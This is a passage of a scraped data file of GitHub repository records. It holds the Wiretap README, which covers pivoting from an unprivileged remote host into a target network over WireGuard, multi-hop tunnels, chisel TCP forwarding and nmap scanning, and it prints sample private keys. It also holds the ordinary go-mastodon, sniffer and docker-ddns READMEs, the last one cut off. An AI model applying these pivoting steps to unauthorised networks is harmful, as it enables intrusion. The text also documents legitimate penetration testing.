1.3.3.7:1337\n\n```\n\nInstall the resulting config either by copying and pasting the output or by importing the new `wiretap.conf` file into WireGuard:\n\n* If using a GUI, select the menu option similar to *Import Tunnel(s) From File*\n* If you have `wg-quick` installed, `sudo wg-quick up ./wiretap.conf`\n\nDon't forget to disable or remove the tunnel when you're done (e.g., `sudo wg-quick down ./wiretap.conf`)\n\n### Deploy\n\nOn the remote machine, upload the binary and then copy the command with the private and public keys to start Wiretap in server mode:\n```\n.\\wiretap.exe serve --private qGrU0juci5PLJ1ydSufE/UwlErL/bqfcz6uWil705UU= --public ZhRIAcGVwT7l9dhEXv7cvYKwLxOZJR4bgU4zePZaT04= --endpoint 1.3.3.7:1337\n```\n\nConfirm that the client and server have successfully completed the handshake. The client should see a successful handshake in whatever WireGuard interface is running. If using the command-line tools, check with `wg show`.\n\n### Add Peers (optional)\n\n
\n\n![Wiretap Add Arguments](media/Wiretap_Add.svg)\n
\n\nYou can create new configurations after deployment for sharing access to the target network with others.\n\nTo test access to the Wiretap API running on the server, run:\n\n```bash\n./wiretap ping\n```\n```\nresponse: pong\n from: a::\n time: 2.685600 milliseconds\n```\n\nA successful `pong` message indicates that the API is responsive and commands like `add` will now work.\n\nAdding a peer is very similar to configuring Wiretap initially. It will generate a configuration file you can share, but it will not output arguments that need to be passed to the server because that information is passed via the API. If you're generating a configuration for someone else, get their address information for the endpoint and port flags.\n\n```bash\n./wiretap add --port 1337 --endpoint 1.3.3.8:1337 --routes 10.0.0.0/24\n```\n```\n\nConfiguration successfully generated and pushed to server.\nImport this config locally or send it to a friend.\n\nconfig: wiretap_1.conf\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n[Interface]\nPrivateKey = UJsLCSTg6xqfrKJtXQioaek/mCj4gzOdUIrp/+NkJ3Q=\nAddress = 192.168.0.3/32\nAddress = fd::3/128\nListenPort = 1337\n\n[Peer]\nPublicKey = 7mVguCBt7qxMsjDHR7WzzzNXbyBi5Q35gMvyUxjWMWc=\nAllowedIPs = 10.0.0.0/24,a::/128\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n```\n\nAt this point, the server will attempt to reach out to the provided endpoint. Share the config file and have the recipient import it into WireGuard for Wiretap to connect.\n\n> **Note**\n> To add another peer on the same machine, you will need to specify an unused port, unused routes, and disable the API route.\n\n## Help\n\n```bash\n./wiretap --help --show-hidden\n```\n```\nUsage:\n wiretap [flags]\n wiretap [command]\n\nAvailable Commands:\n add Add peer to wiretap\n configure Build wireguard config\n help Help about any command\n ping Ping wiretap server API\n serve Listen and proxy traffic into target network\n\nFlags:\n -h, --help help for wiretap\n --show-hidden show hidden flag options\n -v, --version version for wiretap\n\nUse \"wiretap [command] --help\" for more information about a command.\n```\n\n## Features\n\n* Network\n - IPv4\n - IPv6\n - ICMPv4: Echo requests and replies\n - ICMPv6: Echo requests and replies\n* Transport\n - TCP\n - Transparent connections\n - RST response when port is unreachable\n - UDP\n - Transparent \"connections\"\n - ICMP Destination Unreachable when port is unreachable\n* API\n - API internal to Wiretap for dynamic configuration\n - Add peers after deployment for multi-user support\n\n## Demo\n\nThe demo has three hosts and two networks:\n\n```\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 client \u2502\n\u2502 \u2502\n\u2502 10.1.0.2 \u2502\n\u2502 fd:1::2 \u251c\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 exposed network \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 10.1.0.0/16,fd:1::/64 \u2502\n\u2502 10.1.0.3 \u251c\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 fd:1::3 \u2502\n\u2502 \u2502\n\u2502 server \u2502\n\u2502 \u2502\n\u2502 10.2.0.3 \u2502\n\u2502 fd:2::3 \u251c\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 target network \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2502 10.2.0.0/16,fd:2::/64 \u2502\n\u2502 10.2.0.4 \u251c\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 fd:2::4 \u2502\n\u2502 \u2502\n\u2502 target \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\n### Video\n\n
\n\n\nhttps://user-images.githubusercontent.com/26662746/202822223-af752660-f263-43dc-bdf1-63140bab316b.mp4\n
\n\n### Step-By-Step\n\nYou have unprivileged access to the server host and want to reach the target host from the client host using Wiretap. \n\n#### Setup\n\nClone this repo.\n\nStart the demo containers with:\n```bash\ndocker compose up --build\n```\n\nOpen new tabs for interactive sessions with the client and server machines:\n```bash\ndocker exec -it wiretap-client-1 bash\n```\n```bash\ndocker exec -it wiretap-server-1 bash\n```\n\n#### Observe Network Limitations\n\nThe target network, and therefore the target host, is unreachable from the client machine. Both the server and target hosts are running a web service on port 80, so try interacting with each of the services from each of the hosts:\n\nAccessing the server's web service from the client should work:\n```bash\nclient$ curl http://10.1.0.3\n```\n\nAccessing the target web service from the client should not work, but doing the same thing from the server machine will:\n\n```bash\n# fails\nclient$ curl http://10.2.0.4\n```\n```bash\nserver$ curl http://10.2.0.4\n```\n\n#### Configure\n\nConfigure Wiretap from the client machine. Remember, `--endpoint` is how the server machine should reach the client and `--routes` determines which traffic is routed through Wiretap. \n\n* `--endpoint` needs to be the client address and the default WireGuard port: `10.1.0.2:51820`\n* `--routes` needs to be the subnet of the target network: `10.2.0.0/16`. But there is also an IPv6 subnet, so we should also put `fd:2::/64`. If you just wanted to route traffic to the target host, you could put `10.2.0.4/32` here instead\n\n```bash\n./wiretap_linux_amd64 configure --endpoint 10.1.0.2:51820 --routes 10.2.0.0/16,fd:2::/64\n```\n\nInstall the newly created WireGuard config with:\n\n```bash\nwg-quick up ./wiretap.conf\n```\n\nCopy and paste the Wiretap arguments printed by the configure command into the server machine prompt. It should look like this:\n\n```bash\n./wiretap_linux_amd64 serve --private --public --endpoint 10.1.0.2:51820\n```\n\n#### Test\n\nThe WireGuard handshake should be complete. Confirm with:\n\n```bash\nwg show\n```\n\nIf the handshake was successful the client should be able to reach the target network transparently. Confirm by running the same test that failed before:\n\n```bash\nclient$ curl http://10.2.0.4\n```\n\nThat's it! Try scanning, pinging, and anything else you can think of (please submit an issue if you think something should work but doesn't!). Here are a few ideas:\n- HTTP\n - `curl http://10.2.0.4`\n - `curl http://[fd:2::4]`\n- Nmap\n - `nmap 10.2.0.4 -v`\n - `nmap -6 fd:2::4 -v`\n- ICMP\n - `ping 10.2.0.4`\n - `ping fd:2::4`\n- UDP\n - `nmap -sU 10.2.0.4 -v`\n - `nmap -sU -6 fd:2::4 -v`\n\n#### Teardown\n\nTo bring down the WireGuard interface on the client machine, run:\n\n```bash\nwg-quick down ./wiretap.conf\n```\n\n## How It Works\n\nA traditional VPN can't be installed by unprivileged users because VPNs rely on dangerous operations like changing network routes and working with raw packets. \n\nWiretap bypasses this requirement by rerouting traffic to a user-space TCP/IP network stack, where a listener accepts connections on behalf of the true destination. Then it creates a new connection to the true destination and copies data between the endpoint and the peer. This is similar to how https://github.com/sshuttle/sshuttle works, but relies on WireGuard as the tunneling mechanism rather than SSH. \n\n\n## Experimental\n\n### TCP Tunneling\n\n> **Note**\n> Performance will suffer, only use TCP Tunneling as a last resort\n\nIf you have *no* outbound UDP access, you can still use Wiretap, but you'll need to tunnel WireGuard traffic through TCP. This should only be used as a last resort. From WireGuard's [Known Limitations](https://www.wireguard.com/known-limitations/) page:\n> **TCP Mode**\n>\n> WireGuard explicitly does not support tunneling over TCP, due to the classically terrible network performance of tunneling TCP-over-TCP. Rather, transforming WireGuard's UDP packets into TCP is the job of an upper layer of obfuscation (see previous point), and can be accomplished by projects like [udptunnel](https://github.com/rfc1036/udptunnel) and [udp2raw](https://github.com/wangyu-/udp2raw-tunnel).\n\nAnother great tool that has similar cross-platform capabilities to Wiretap is [Chisel](https://github.com/jpillora/chisel). We can use chisel to forward a UDP port to the remote system over TCP. To use:\n\nRun chisel server on the client system, specifying a TCP port you can reach from the server system:\n```bash\n./chisel server --port 8080\n```\n\nOn the server system, forward the port with this command using the same TCP port you specified in the previous command and using the ListenPort you specified when configuring Wiretap (the default is 51820). The format is `:0.0.0.0:/udp`.\n\nIn this example, we're forwarding 51821/udp on the server to 51820 on the client:\n```bash\n./chisel client :8080 51821:0.0.0.0:51820/udp\n```\n\nFinally, run Wiretap with the forwarded local port as your endpoint on the server system:\n```bash\n./wiretap serve --private --public --endpoint localhost:51821\n```\n\n### Nested Tunnels\n\nIt is possible to nest multiple WireGuard tunnels using Wiretap, allowing for multiple hops without requiring root on any of the intermediate nodes.\n\nUsing this network as an example, we can deploy Wiretap to both hop 1 and hop 2 machines in order to access the target machine on network 3.\n```\n \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\n\u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502\n\u2502 \u2502 client \u251c\u2500\u2500\u253c\u2500\u25ba\u2502 hop 1 \u251c\u2500\u253c\u2500\u2500\u253c\u2500\u25ba\u2502 hop 2 \u251c\u2500\u253c\u2500\u2500\u25ba\u2502 target \u2502 \u2502\n\u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502 \u2502\n\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n network 1: \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 network 3:\n 10.0.1.0/24 network 2: 10.0.3.0/24\n 10.0.2.0/24\n```\n\nAfter deploying Wiretap to hop 1 normally, re-run the configure command but forgo the endpoint argument because Wiretap currently has no way of tunneling traffic *back* to the client machine if initiated from the server side of the network. In the future Wiretap may support routing between multiple instances of Wiretap.\n\n> **Note**\n> Make sure the routes and port are different from the initial configuration\n\n```bash\n./wiretap configure --port 51821 --routes 10.0.3.0/24\n```\n\nThen deploy Wiretap to hop 2 with the resulting arguments. Because no endpoint was provided, the Endpoint parameter needs to be provided manually to the config file. This depends on the client being able to access hop 2 *through the first hop's instance of Wiretap*! Add the endpoint to the peer section of the new Wiretap config:\n\n```\nEndpoint = 10.0.2.2:51820\n```\n\nFinally, import the config into WireGuard on the client system. The client system will handshake with Wiretap on hop 2 via the tunnel to hop 1, and then all future connections to 10.0.3.0/24 will be routed to network 3 through both hops. \n", "readme_type": "markdown", "hn_comments": "I\u2019m not sure to understand what makes it different from WireGuard. Could someone eli5 ?Wireproxy can do similar stuff: https://github.com/octeep/wireproxy(Disclaimer: I am a contributor to Wireproxy)Hilarious name for an open source project released by a government lab.The focus here is on the fact that it runs in userspace. Tailscale in userspace does something similar where it receives packet \"meta-data\" and then just creates the packet that came through the tunnel and sends it out the lan interface. Is this what happens here? I do like the docker option ;)mitmproxy just gained this feature in 9.0.0 too: https://mitmproxy.org/posts/wireguard-mode/Cool project, but AV are gonna flag the shit out of it.ssf and other tunneling techno are already abused by a lot of threat actors ...Wire this to Lightning and profit.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattn/go-mastodon", "link": "https://github.com/mattn/go-mastodon", "tags": ["mastodon", "golang", "go"], "stars": 538, "description": "mastodon client for golang", "lang": "Go", "repo_lang": "", "readme": "# go-mastodon\n\n[![Build Status](https://github.com/mattn/go-mastodon/workflows/test/badge.svg?branch=master)](https://github.com/mattn/go-mastodon/actions?query=workflow%3Atest)\n[![Codecov](https://codecov.io/gh/mattn/go-mastodon/branch/master/graph/badge.svg)](https://codecov.io/gh/mattn/go-mastodon)\n[![Go Reference](https://pkg.go.dev/badge/github.com/mattn/go-mastodon.svg)](https://pkg.go.dev/github.com/mattn/go-mastodon)\n[![Go Report Card](https://goreportcard.com/badge/github.com/mattn/go-mastodon)](https://goreportcard.com/report/github.com/mattn/go-mastodon)\n\n\n## Usage\n\n### Application\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/mattn/go-mastodon\"\n)\n\nfunc main() {\n\tapp, err := mastodon.RegisterApp(context.Background(), &mastodon.AppConfig{\n\t\tServer: \"https://mstdn.jp\",\n\t\tClientName: \"client-name\",\n\t\tScopes: \"read write follow\",\n\t\tWebsite: \"https://github.com/mattn/go-mastodon\",\n\t})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfmt.Printf(\"client-id : %s\\n\", app.ClientID)\n\tfmt.Printf(\"client-secret: %s\\n\", app.ClientSecret)\n}\n```\n\n### Client\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/mattn/go-mastodon\"\n)\n\nfunc main() {\n\tc := mastodon.NewClient(&mastodon.Config{\n\t\tServer: \"https://mstdn.jp\",\n\t\tClientID: \"client-id\",\n\t\tClientSecret: \"client-secret\",\n\t})\n\terr := c.Authenticate(context.Background(), \"your-email\", \"your-password\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\ttimeline, err := c.GetTimelineHome(context.Background(), nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfor i := len(timeline) - 1; i >= 0; i-- {\n\t\tfmt.Println(timeline[i])\n\t}\n}\n```\n\n## Status of implementations\n\n* [x] GET /api/v1/accounts/:id\n* [x] GET /api/v1/accounts/verify_credentials\n* [x] PATCH /api/v1/accounts/update_credentials\n* [x] GET /api/v1/accounts/:id/followers\n* [x] GET /api/v1/accounts/:id/following\n* [x] GET /api/v1/accounts/:id/statuses\n* [x] POST /api/v1/accounts/:id/follow\n* [x] POST /api/v1/accounts/:id/unfollow\n* [x] GET /api/v1/accounts/:id/block\n* [x] GET /api/v1/accounts/:id/unblock\n* [x] GET /api/v1/accounts/:id/mute\n* [x] GET /api/v1/accounts/:id/unmute\n* [x] GET /api/v1/accounts/:id/lists\n* [x] GET /api/v1/accounts/relationships\n* [x] GET /api/v1/accounts/search\n* [x] GET /api/v1/apps/verify_credentials\n* [x] GET /api/v1/bookmarks\n* [x] POST /api/v1/apps\n* [x] GET /api/v1/blocks\n* [x] GET /api/v1/conversations\n* [x] DELETE /api/v1/conversations/:id\n* [x] POST /api/v1/conversations/:id/read\n* [x] GET /api/v1/favourites\n* [x] GET /api/v1/filters\n* [x] POST /api/v1/filters\n* [x] GET /api/v1/filters/:id\n* [x] PUT /api/v1/filters/:id\n* [x] DELETE /api/v1/filters/:id\n* [x] GET /api/v1/follow_requests\n* [x] POST /api/v1/follow_requests/:id/authorize\n* [x] POST /api/v1/follow_requests/:id/reject\n* [x] POST /api/v1/follows\n* [x] GET /api/v1/instance\n* [x] GET /api/v1/instance/activity\n* [x] GET /api/v1/instance/peers\n* [x] GET /api/v1/lists\n* [x] GET /api/v1/lists/:id/accounts\n* [x] GET /api/v1/lists/:id\n* [x] POST /api/v1/lists\n* [x] PUT /api/v1/lists/:id\n* [x] DELETE /api/v1/lists/:id\n* [x] POST /api/v1/lists/:id/accounts\n* [x] DELETE /api/v1/lists/:id/accounts\n* [x] POST /api/v1/media\n* [x] GET /api/v1/mutes\n* [x] GET /api/v1/notifications\n* [x] GET /api/v1/notifications/:id\n* [x] POST /api/v1/notifications/:id/dismiss\n* [x] POST /api/v1/notifications/clear\n* [x] POST /api/v1/push/subscription\n* [x] GET /api/v1/push/subscription\n* [x] PUT /api/v1/push/subscription\n* [x] DELETE /api/v1/push/subscription\n* [x] GET /api/v1/reports\n* [x] POST /api/v1/reports\n* [x] GET /api/v2/search\n* [x] GET /api/v1/statuses/:id\n* [x] GET /api/v1/statuses/:id/context\n* [x] GET /api/v1/statuses/:id/card\n* [x] GET /api/v1/statuses/:id/history\n* [x] GET /api/v1/statuses/:id/reblogged_by\n* [x] GET /api/v1/statuses/:id/source\n* [x] GET /api/v1/statuses/:id/favourited_by\n* [x] POST /api/v1/statuses\n* [x] PUT /api/v1/statuses/:id\n* [x] DELETE /api/v1/statuses/:id\n* [x] POST /api/v1/statuses/:id/reblog\n* [x] POST /api/v1/statuses/:id/unreblog\n* [x] POST /api/v1/statuses/:id/favourite\n* [x] POST /api/v1/statuses/:id/unfavourite\n* [x] POST /api/v1/statuses/:id/bookmark\n* [x] POST /api/v1/statuses/:id/unbookmark\n* [x] GET /api/v1/timelines/home\n* [x] GET /api/v1/timelines/public\n* [x] GET /api/v1/timelines/tag/:hashtag\n* [x] GET /api/v1/timelines/list/:id\n* [x] GET /api/v1/streaming/user\n* [x] GET /api/v1/streaming/public\n* [x] GET /api/v1/streaming/hashtag?tag=:hashtag\n* [x] GET /api/v1/streaming/hashtag/local?tag=:hashtag\n* [x] GET /api/v1/streaming/list?list=:list_id\n* [x] GET /api/v1/streaming/direct\n\n## Installation\n\n```shell\ngo install github.com/mattn/go-mastodon@latest\n```\n\n## License\n\nMIT\n\n## Author\n\nYasuhiro Matsumoto (a.k.a. mattn)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chenjiandongx/sniffer", "link": "https://github.com/chenjiandongx/sniffer", "tags": ["sniffer", "packets", "gopacket", "traffic", "networking", "cli", "pcap", "tcpdump"], "stars": 538, "description": "\ud83e\udd12 A modern alternative network traffic sniffer.", "lang": "Go", "repo_lang": "", "readme": "# sniffer\n\n[![GoDoc](https://godoc.org/github.com/chenjiandongx/sniffer?status.svg)](https://godoc.org/github.com/chenjiandongx/sniffer)\n[![Go Report Card](https://goreportcard.com/badge/github.com/chenjiandongx/sniffer)](https://goreportcard.com/report/github.com/chenjiandongx/sniffer)\n[![License](https://img.shields.io/badge/License-MIT-brightgreen.svg)](https://opensource.org/licenses/MIT)\n\n> *A modern alternative network traffic sniffer inspired by [bandwhich](https://github.com/imsnif/bandwhich)(Rust) and [nethogs](https://github.com/raboof/nethogs)(C++).*\n\nhttps://user-images.githubusercontent.com/19553554/147360587-a3cfee18-7eb6-464b-9173-9afe6ee86cdf.mov\n\n## Introduction\n\n[\u4e2d\u6587\u4ecb\u7ecd](https://chenjiandongx.me/2021/11/17/sniffer-network-traffic/)\n\nsniffer is designed for network troubleshooting. It can be started at any time to analyze the processes or connections causing increases in network traffic without loading any kernel modules. By the way, the TUI of it is responsive that can fit with terminals of all sizes automatically.\n\nsniffer manipulates [gopacket](https://github.com/google/gopacket) to sniff the interfaces and record packets' info. gopacket wraps the Golang port of `libpacp` library, and provides some additional features. One of the projects that inspired the sniffer is `bandwhich`, which has a sophisticated interface and multiple ways to display data, but it does not support BPF filters. Another one is `nethlogs`, which supports BPF filters, but can only view data by process, without connections or remote address perspective. sniffer combines the advantages of those two projects also adhering a new Plot mode.\n\n***Connections and Process Matching***\n\nOn Linux, sniffer refers to the ways in which the [ss](https://man7.org/linux/man-pages/man8/ss.8.html) tool used, obtaining the connections of the `ESTABLISHED` state by [netlink socket](https://man7.org/linux/man-pages/man7/netlink.7.html). Since that approach is more efficient than reading the `/proc/net/*` files directly. But both need to aggregate and calculate the network traffic of the process by matching the `inode` information under `/proc/${pid}/fd`.\n\nOn macOS, the [lsof](https://ss64.com/osx/lsof.html) command is invoked, which relies on capturing the command output for analyzing process connections information. And sniffer manipulates the API provided by [gopsutil](https://github.com/shirou/gopsutil) directly on Windows.\n\n## Installation\n\n***sniffer*** relies on the `libpcap` library to capture user-level packets hence you need to have it installed first.\n\n### Linux / Windows\n\n**Debian/Ubuntu**\n```shell\n$ sudo apt-get install libpcap-dev\n```\n\n**CentOS/Fedora**\n```shell\n$ sudo yum install libpcap libpcap-devel\n```\n\n**Windows**\n\nWindows need to have [npcap](https://nmap.org/npcap/) installed for capturing packets.\n\nAfter that, install sniffer by `go get` command.\n\n```shell\n$ go get -u github.com/chenjiandongx/sniffer\n```\n\n### MacOS\n\n```shell\n$ brew install sniffer\n```\n\n## Usages\n\n```shell\n\u276f sniffer -h\n# A modern alternative network traffic sniffer.\n\nUsage:\n sniffer [flags]\n\nExamples:\n # bytes mode in MB unit\n $ sniffer -u MB\n\n # only capture the TCP protocol packets with lo,eth prefixed devices\n $ sniffer -b tcp -d lo -d eth\n\nFlags:\n -a, --all-devices listen all devices if present\n -b, --bpf string specify string pcap filter with the BPF syntax (default \"tcp or udp\")\n -d, --devices-prefix stringArray prefixed devices to monitor (default [en,lo,eth,em,bond])\n -h, --help help for sniffer\n -i, --interval int interval for refresh rate in seconds (default 1)\n -l, --list list all devices name\n -m, --mode int view mode of sniffer (0: bytes 1: packets 2: plot)\n -n, --no-dns-resolve disable the DNS resolution\n -u, --unit string unit of traffic stats, optional: B, Kb, KB, Mb, MB, Gb, GB (default \"KB\")\n -v, --version version for sniffer\n```\n\n**Hotkeys**\n\n| Keys | Description |\n| ---- | ----------- |\n| Space | pause refreshing |\n| Tab | rearrange tables |\n| s | switch next view mode |\n| q | quit |\n\n## Performance\n\n[iperf](https://github.com/esnet/iperf) is a tool for active measurements of the maximum achievable bandwidth on IP networks. Next we use this tool to forge massive packets on the `lo` device.\n\n```shell\n$ iperf -s -p 5001\n$ iperf -c localhost --parallel 40 -i 1 -t 2000\n```\n\n***sniffer vs bandwhich vs nethogs***\n\nAs you can see, CPU overheads `bandwhich > sniffer > nethogs`, memory overheads `sniffer > nethogs > bandwhich`.\n```shell\n PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND\n 128405 root 20 0 210168 5184 3596 S 31.0 0.3 1:21.69 bandwhich\n 128596 root 20 0 1449872 21912 8512 S 20.7 1.1 0:28.54 sniffer\n 128415 root 20 0 18936 7464 6900 S 5.7 0.4 0:11.56 nethogs\n```\n\nSee what stats they show, sniffer and bandwhich output are very approximate(~ 2.5GB/s). netlogs can only handles packets 1.122GB/s.\n\n| | sniffer | bandwhich | nethogs |\n| -- | ------- | --------- | ------- |\n| **Upload** | 2.5GiBps | 2.5GiBps | 1.12GiBps |\n\n## View Mode\n\n***Bytes Mode:*** display traffic stats in bytes by the Table widget.\n\n![](https://user-images.githubusercontent.com/19553554/147360714-98709e52-1f73-4882-ba56-30f572be9b7e.jpg)\n\n***Packets Mode:*** display traffic stats in packets by the Table widget.\n\n![](https://user-images.githubusercontent.com/19553554/147360686-5600d65b-9685-486b-b7cf-42c341364009.jpg)\n\n## License\n\nMIT [\u00a9chenjiandongx](https://github.com/chenjiandongx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dprandzioch/docker-ddns", "link": "https://github.com/dprandzioch/docker-ddns", "tags": ["selfhosted", "self-hosted", "docker", "dynamic-dns", "dns", "ddns"], "stars": 537, "description": "Easy-to-deploy dynamic DNS with Docker, Go and Bind9", "lang": "Go", "repo_lang": "", "readme": "# Dynamic DNS with Docker, Go and Bind9\n\n![DockerHub build status](https://dockerbuildbadges.quelltext.eu/status.svg?organization=davd&repository=docker-ddns)\n![Travis build status](https://travis-ci.com/dprandzioch/docker-ddns.svg?branch=master)\n\nThis package allows you to set up a dynamic DNS server that allows you to connect to\ndevices at home from anywhere in the world. All you need is a cheap VPS, a domain and access to it's nameserver.\n\n![Connect to your NAS from work](https://raw.githubusercontent.com/dprandzioch/docker-ddns/develop/connect-to-your-nas-from-work.png)\n\n## Installation\n\nYou can either take the image from DockerHub or build it on your own.\n\n### Using DockerHub\n\nJust customize this to your needs and run:\n\n```\ndocker run -it -d \\\n -p 8080:8080 \\\n -p 53:53 \\\n -p 53:53/udp \\\n -e SHARED_SECRET=changeme \\\n -e ZONE=example.org \\\n -e RECORD_TTL=3600 \\\n --name=dyndns \\\n davd/docker-ddns:latest\n```\n\nIf you want to persist DNS configuration across container recreation, add `-v /somefolder:/var/cache/bind`. If you are experiencing any \nissues updating DNS configuration using the API (`NOTAUTH` and `SERVFAIL`), make sure to add writing permissions for root (UID=0) to your \npersistent storage (e.g. `chmod -R a+w /somefolder`).\n\nYou can also use Compose / Swarm to set up this project. For more information and an example `docker-compose.yml` with persistent data \nstorage, please refer to this file: https://github.com/dprandzioch/docker-ddns/blob/master/docker-compose.yml\n\n### Build from source / GitHub\n\n```\ngit clone https://github.com/dprandzioch/docker-ddns\ngit checkout master # Make sure to build the latest stable release\ncd docker-ddns\n$EDITOR envfile\nmake deploy\n```\n\nMake sure to change all environment variables in `envfile` to match your needs. Some more information can be found here: \nhttps://www.davd.io/build-your-own-dynamic-dns-in-5-minutes/\n\n## Exposed ports\n\nAfterwards you have a running docker container that exposes three ports:\n\n* 53/TCP -> DNS\n* 53/UDP -> DNS\n* 8080/TCP -> Management REST API\n\n\n## Using the API\n\nThat package features a simple REST API written in Go, that provides a simple\ninterface, that almost any router that supports Custom DDNS providers can\nattach to (e.g. Fritz!Box). It is highly recommended to put a reverse proxy\nbefore the API.\n\nIt provides one single GET request, that is used as follows:\n\nhttp://myhost.mydomain.tld:8080/update?secret=changeme&domain=foo&addr=1.2.3.4\n\n### Fields\n\n* `secret`: The shared secret set in `envfile`\n* `domain`: The subdomain to your configured domain, in this example it would\n result in `foo.example.org`. Could also be multiple domains that should be\n redirected to the same domain separated by comma, so \"foo,bar\"\n* `addr`: IPv4 or IPv6 address of the name record\n\n\nFor the DynDNS compatible fields please see Dyn's documentation here: \n\n```\nhttps://help.dyn.com/remote-access-api/perform-update/\n```\n\n\n### DynDNS compatible API\n\nThis package contains a DynDNS compatible handler for convenience and for use cases\nwhere clients cannot be modified to use the JSON responses and/or URL scheme outlined\nabove.\n\nThis has been tested with a number of routers. Just point the router to your DDNS domain\nfor updates.\n\nThe handlers will listen on:\n* /nic/update\n* /v2/update\n* /v3/update\n\n\n**The username is not validated at all so you can use anything as a username**\n**Password is the shared secret provided as an ENV variable**\n\n#### Examples\n\nAn example on the ddclient (Linux DDNS client) based Ubiquiti router line:\n\nset service dns dynamic interface eth0 service dyndns host-name \nset service dns dynamic interface eth0 service dyndns login \nset service dns dynamic interface eth0 service dyndns password \nset service dns dynamic interface eth0 service dyndns protocol dyndns2\nset service dns dynamic interface eth0 service dyndns server \n\nOptional if you used this behind an HTTPS reverse proxy like I do:\n\nset service dns dynamic interface eth0 service 